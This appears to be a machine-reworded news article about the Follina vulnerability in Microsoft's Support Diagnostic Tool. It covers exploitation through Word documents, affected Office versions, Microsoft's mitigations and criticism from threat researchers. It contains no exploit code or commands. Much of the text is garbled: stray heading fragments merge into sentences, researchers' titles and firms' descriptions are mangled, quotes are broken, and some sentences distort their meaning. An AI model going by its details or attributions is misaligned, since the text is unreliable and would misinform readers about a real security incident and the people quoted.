Researchers have final warning Over the weekend, a vulnerability in Microsoft’s support diagnostic tool could be exploited to remotely control a target device using a malicious Word document.Microsoft Publishing Guidelines Monday, including temporary defensive measures.As of Tuesday, the U.S. Cybersecurity and Infrastructure Security Agency has warn “A remote, unauthenticated attacker could exploit this vulnerability,” dubbed Follina, “to take control of an affected system.” But Microsoft would not say when or if a patch for the flaw will be released, although the company has acknowledged the flaw. Being actively exploited by attackers in the wild. When asked by WIRED yesterday, the company still had no comment on the possibility of a patch.
The Follina vulnerability in the Windows Support Tools could easily be exploited by a specially crafted Word document. The lure is equipped with a remote template that retrieves malicious HTML files and ultimately allows attackers to execute Powershell commands in Windows. The researchers noted that they described the vulnerability as a “zero-day” or a previously unknown vulnerability, but Microsoft did not classify it as such.
Tom Hegel, a senior threat researcher at security firm SentinelOne, said: “As the public learns more about the vulnerability, we’re starting to see immediate responses from various attackers who start using it.” Attackers have been observed exploiting the vulnerability through malicious documents, but researchers have also discovered other methods, including manipulating HTML content in web traffic.
“While malicious documentation methods are very concerning, the less documented methods that can trigger exploits are troubling until patched,” Hegel said. “I expect opportunistic and targeted threat actors to use this vulnerability in various ways when options are available – it’s too easy.”
The vulnerability exists in all supported Windows versions and can be exploited through Microsoft Office 365, Office 2013 to 2019, Office 2021, and Office ProPlus. The main mitigations proposed by Microsoft include disabling specific protocols in the Support Diagnostic Tool and using Microsoft Defender Antivirus to monitor and block exploits.
But incident responders say more action is needed given how easy it is to exploit the vulnerability and how much malicious activity was detected.
Michael Raggi, an employee threat researcher at Proofpoint, a security firm focused on Chinese state-backed hackers, said: “We’re seeing various APT actors integrate this technique into longer infection chains that exploit the Follina vulnerability.” For example, in 2022 On May 30, we observed Chinese APT actor TA413 sending a malicious URL in an email posing as the Central Tibetan Administration. Different actors insert Follina-related files at different stages of their infection chain, depending on their pre-existing toolkit and deployed strategy. “
The researchers also seen malicious file exploit Follina is targeting Russia, India, the Philippines, Belarus and Nepal.First Undergraduate Researcher The flaw was noticed in August 2020, but it was first reported to Microsoft on April 21. The researchers also noted that the Follina hacks were particularly useful to attackers because they could be extracted from malicious documents without relying on macros, an abused Office document feature that Microsoft has been working hard to control.
Sherrod DeGrippo, vice president of threat research at Proofpoint, said: “Proofpoint has identified a variety of actors involved in the Follina vulnerability in phishing campaigns.”
For all these real-world exploits, the question is whether the guidance Microsoft has issued so far is sufficient and proportional to the risk.
“Security teams can view Microsoft’s indifferent approach as a sign that it’s ‘just another vulnerability,'” said Jake Williams, director of cyber threat intelligence at security firm Scythe. “It’s not clear why Microsoft continues to downplay this vulnerability,” he said. Especially when it’s actively exploited in the wild.”
